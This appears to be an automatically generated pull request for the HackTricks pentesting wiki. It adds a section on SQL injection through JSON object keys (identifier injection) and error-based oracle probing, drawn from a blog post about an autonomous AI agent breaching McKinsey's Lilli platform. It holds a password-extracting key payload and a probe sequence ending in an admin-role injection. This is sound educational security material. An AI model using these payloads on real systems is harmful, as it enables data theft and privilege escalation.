🤖 Automated Content Update
This PR was automatically generated by the HackTricks News Bot based on a technical blog post.
📝 Source Information
Original Blog Post: https://codewall.ai/blog/how-we-hacked-mckinseys-ai-platform
Content Categories: Pentesting Web -> SQL Injection (add subsection on SQLi via JSON keys / identifier injection; include notes on error-based oracle exploitation and why scanners miss key-fuzzing)
Bot Version: HackTricks News Bot v1.0
🎯 Content Summary
Title/Context
McKinsey’s internal AI platform “Lilli” (launched 2023) provides chat, document analysis, and RAG/search across 100,000+ internal documents for 43,000+ employees (adopted by 70%+; 500,000+ prompts/month). The post claims an autonomous offensive agent (no credentials, no insider knowledge, no human-in-the-loop) achieved full read and write access to the production database within ~2 hours using only the exposed attac...
🔧 Technical Details
SQLi via JSON key/identifier injection
If an API builds SQL dynamically from user-controlled JSON object keys (field names) and concatenates them into the query string, parameterizing only the values does not prevent SQL injection: attackers can place SQL fragments in the key positions (identifier injection). Scanners that fuzz only values commonly miss this class of SQLi, so testing must also fuzz keys/field names and any server-side mapping that turns JSON object properties into SQL identifiers.
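A minimal sketch of the vulnerable pattern (the `update_profile` function and `users` schema are hypothetical; SQLite is used only for illustration): the values are bound with placeholders, but the JSON keys are concatenated into the statement as identifiers.

```python
import sqlite3

def update_profile(db, user_id, fields):
    # VULNERABLE: JSON object keys become SQL identifiers via string
    # concatenation; only the *values* are parameterized.
    assignments = ", ".join(f"{key} = ?" for key in fields)
    sql = f"UPDATE users SET {assignments} WHERE id = ?"
    db.execute(sql, (*fields.values(), user_id))

# A malicious *key* injects in identifier position, e.g.:
#   {"email = (SELECT password FROM users WHERE id = 1), name": "x"}
# which expands to:
#   UPDATE users SET email = (SELECT password FROM users WHERE id = 1),
#                    name = ? WHERE id = ?
# leaking the password into a readable column despite parameterized values.
```

A value-only scanner never reaches this sink: every value it sends is safely bound, so the injection point in the key position stays invisible.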
Error-based feedback loop to derive “query shape”
When the backend returns database errors that reflect attacker-controlled input (including JSON keys), those errors act as an oracle. An attacker can iterate: inject malformed syntax → read the error → infer where the input lands in SQL → refine payload. Repeating this across multiple requests can transition from blind probing to valid injected SQL and reliable data extraction.
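The feedback loop can be illustrated with a local stand-in for such a backend (SQLite here; the table, payloads, and `oracle` function are illustrative, not taken from the post). Each reflected error narrows down where the injected key lands in the query:

```python
import sqlite3

def oracle(key):
    # Stand-in for a backend that reflects raw DB errors to the client.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'alice', 'user')")
    try:
        # The JSON key is concatenated as an identifier, as in the vuln class.
        db.execute(f"UPDATE users SET {key} = ? WHERE id = ?", ("x", 1))
        return "200 OK"
    except sqlite3.Error as exc:
        return f"500 {exc}"  # the reflected error text is the oracle

# Iterate: inject malformed syntax -> read error -> infer position -> refine.
oracle("bogus")                 # 500 'no such column' -> identifier position
oracle("name FROM")             # 500 syntax error near FROM -> inside a SET clause
oracle("role = 'admin', name")  # 200 OK -> valid injected SQL achieved
```

Each probe costs one request, so a handful of round trips is enough to go from blind probing to a syntactically valid injected statement.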
🤖 Agent Actions
Summary:
Added a new subsection on SQLi via JSON keys/identifier injection, error-based oracle usage, and why scanners miss key-fuzzing.
Added the blog URL to the References section.
Files updated:
src/pentesting-web/sql-injection/README.md
If you want tweaks to wording or placement, tell me where you’d like it adjusted.
This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.